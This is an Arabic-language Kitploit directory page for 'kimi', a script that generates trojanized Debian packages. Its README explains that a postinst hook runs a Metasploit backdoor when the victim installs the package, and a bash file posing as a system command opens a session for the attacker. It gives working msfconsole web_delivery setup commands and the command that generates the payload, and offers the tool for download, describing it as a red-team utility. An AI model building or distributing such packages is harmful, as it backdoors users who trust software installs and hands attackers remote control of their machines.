Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
kimi — نص برمجي لإنشاء حزم debain ضارة (تروجانات debain). | Kitploit
أدوات/GitHubGitHub/chaitanyaharitash/kimi
أطر الاستغلالتوليد الحمولةما بعد الاستغلالتحليل البرمجيات الخبيثةاختبار الاختراقالقيادة والسيطرةالفريق الأحمرتطوير الحمولات
GitHubchaitanyaharitash/kimi

kimi

نص برمجي لإنشاء حزم debain ضارة (تروجانات debain).

عرض المستودع
123546منذ 7 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

kimi - مولد حزمة دبيان خبيثة

نص برمجي لتوليد حزم دبيان خبيثة (أحصنة طروادة لدبيان).

حول & نقاط القوة & الاستخدام & تم الاختبار على :::

root@kitploit:~
كيمي هو اسم مستوحى من "Kimimaro" إحدى شخصياتي المفضلة من أنمي يسمى "Naruto".

كيمي هو نص برمجي يولد حزمة دبيان خبيثة لميتاسبلويت (metasploit)
والتي تتكون من ملف bash. يتم نشر ملف bash في الدليل "/usr/local/bin/".

يتم تنفيذ الباب الخلفي بمجرد أن يحاول الضحية تثبيت حزمة deb بسبب ملف postinst

ملف bash يقوم بالحقن ويعمل أيضًا كأمر نظامي معين، الذي عندما ينفذه الضحية
ويضرب المهاجم بجلسة.

نقاط القوة :
-- مستقل تمامًا. يعني لا يحتاج المستخدم لتثبيت أي منشئ حزمة دبيان
-- يمكن دمجه بسهولة مع أي مولد حمولة بسبب مشاركات الوسائط (سخيف :P أعرف)

كيمي يعتمد أساسًا على وحدة web_delivery وكل شيء مؤتمت.
كل ما يحتاجه المهاجم هو القيام بالإعدادات التالية :

إعداد Web_Delivery في msf :

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set srvhost 192.168.0.102
srvhost => 192.168.0.102
msf exploit(web_delivery) > set uripath /SecPatch
uripath => /SecPatch
msf exploit(web_delivery) > set Lhost 192.168.0.102
Lhost => 192.168.0.102
msf exploit(web_delivery) > show options
msf exploit(web_delivery) > exploit

توليد الحمولة الخبيثة :

dreamer@mindless ~/Desktop/projects/kimi $ sudo python kimi.py -n nano -l 127.0.0.1 -V 1.0 -a i386

ملاحظة :: تم صنع هذا المشروع لدمجه مع Venom Shellcode Generator 1.0.13.
يمكن استخدامه بشكل مستقل أيضًا، كل ما يحتاجه المستخدم هو تغيير مسار URL في متغيرات msf
-------------------------------------------------------------------------------------

تم الاختبار على :
            لينكس مينت 17.2 سينامون (أوبونتو 14.04) 
            باروت أو إس (ديبيان جيسي)
            كالي رولينج 2.0

تحديثات :::

root@kitploit:~
[22-فبراير-2017]
-- تمت إضافة دالة إنشاء ملف "postinst" لجعل تنفيذ الملف الخبيث المضمن تلقائيًا
-- تمت إضافة دالة إنشاء ملف RC لأتمتة كاملة مع فتح المعالج، يعني لا حاجة لـ
    إعداد المعالج يدويًا
-- تم إصلاح بعض الأخطاء الشائعة [شكر خاص لـ r00t 3xp10it :)]

[12-أكتوبر-2017]
-- تمت إضافة وسيط سطر الأوامر (-a/--arch) لاختيار البنية (i386/amd64)

[24-أبريل-2019] - إصدار اختبار.
-- يمكن الآن تعيين URI و LPORT مخصصين
-- تم تحديث حمولة البايثون وفقًا لبايثون 2/3 وآخر إصدار من Metasploit 5 أيضًا.
-- تم إعادة تنفيذ الكود بالكامل على الرغم من أنه لا يزال يدعم بايثون 2.7

لقطات الشاشة :::

الشعار الرئيسي كيمي قيد التشغيل

متنوعات :::

root@kitploit:~
   منشور المدونة     : http://hackinguyz.blogspot.in/2017/03/kimi-malicious-debian-package-creator.html
   فيديو يوتيوب : https://youtu.be/Dsn6BRHy9_w
   عينة VirusTotal (لأنني رأيت استخدامًا سيئًا لهذا النص في البرية): 7d91abb413c8cd3274f348ff12f244b9a503abfe018f138d34bbe2deab04472f

تحيات لـ :::

نشاط الشل المشبوه [الفريق الأحمر]

استفسارات؟ إهانات؟

تويتر : @bofheaded

تنزيل الأداة